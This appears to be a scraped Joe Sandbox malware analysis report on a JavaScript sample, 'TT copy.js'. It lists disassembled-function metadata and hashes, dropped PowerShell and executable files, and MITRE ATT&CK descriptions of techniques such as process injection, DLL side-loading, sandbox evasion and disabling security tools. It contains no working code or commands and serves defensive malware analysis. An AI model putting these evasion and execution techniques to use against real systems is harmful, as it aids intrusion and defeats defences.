Instruction Fuzzy Hash: 57512A31A00209BBEF25AAE8DDD5FEA77ACAF98705F0401ADD60DA71C0D7719A418F51

Function 019CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019CB6BF

Strings

0, xrefs: 019CB695
0, xrefs: 019CB66F
-, xrefs: 019CB650
+, xrefs: 019CB65A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: b79bb41730009d6e01d013d65c12ee40121c3f794b83503849f32002282d8b69
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 8381D130E012498EEF258E6CC9527FEBBB9AF44BA1F18451DD8DAA7691C73489408B53

Function 019BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019F7B7F
RTL: Resource at %p, xrefs: 019F7B8E
RTL: Re-Waiting, xrefs: 019F7BAC

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
Instruction ID: d3cb9b452140f0640487381e44fc6ddd1dbb88e42b9ac093ba2dc9d3d8f1970b
Opcode Fuzzy Hash: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
Instruction Fuzzy Hash: 2141E2317047069FD725DE29C980BAAB7E9EF89712F100A1DEA9E972C0DB31E4058B91

Function 019BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019F728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019F7294
RTL: Resource at %p, xrefs: 019F72A3
RTL: Re-Waiting, xrefs: 019F72C1

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
Instruction ID: 4cd878bf12a340f73a437c2286dd86f6b38fc3316dd55271c13fa47a76b36b13
Opcode Fuzzy Hash: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
Instruction Fuzzy Hash: FB410535700206AFD725DE69CD81FAAB7A5FB94B11F10061DFA5DA7280DB30F80187D1

Function 019C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019C7E8B

Strings

+, xrefs: 019C7DE8
-, xrefs: 019C7DDD

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: d355c86e44232ad6e700b0e34ea7aedb8d74ec84295209b4a83760a71eb4fbca
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: FF91A871E002179BDB28DFADC881ABE7BA9AF44B21F54451EE9DDE72D0D73099408F12

Function 01989126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01989175
$, xrefs: 01989191

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
Instruction ID: e324a18db8258259025b44936df03bd34e3b36c1d39e75ea0d1eb3e0e936334f
Opcode Fuzzy Hash: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
Instruction Fuzzy Hash: 2E811B75D002699BDB32DB54CC44BEEB7B8BB48714F0041EAAA1DB7640D7709E85CFA0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TT copy.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Temp\dddddd.ps1

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ugok5m[1].ps1

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyprmqbk.i4p.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0s3myqa.2zz.psm1

C:\Users\user\AppData\Local\Temp\x.exe

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
TT copy.js

Function 0145422E Relevance: .9, Instructions: 926
COMMON

Function 01453028 Relevance: .4, Instructions: 401
COMMON

Function 01450848 Relevance: .2, Instructions: 210
COMMON

Function 01455862 Relevance: 2.0, APIs: 1, Instructions: 528
threadCOMMON

Function 01455344 Relevance: 1.8, APIs: 1, Instructions: 324
processCOMMON

Function 01455350 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Function 01455E30 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Function 01455E38 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 01456088 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 01456090 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Function 01455BE0 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Function 014561A8 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Function 014561B0 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre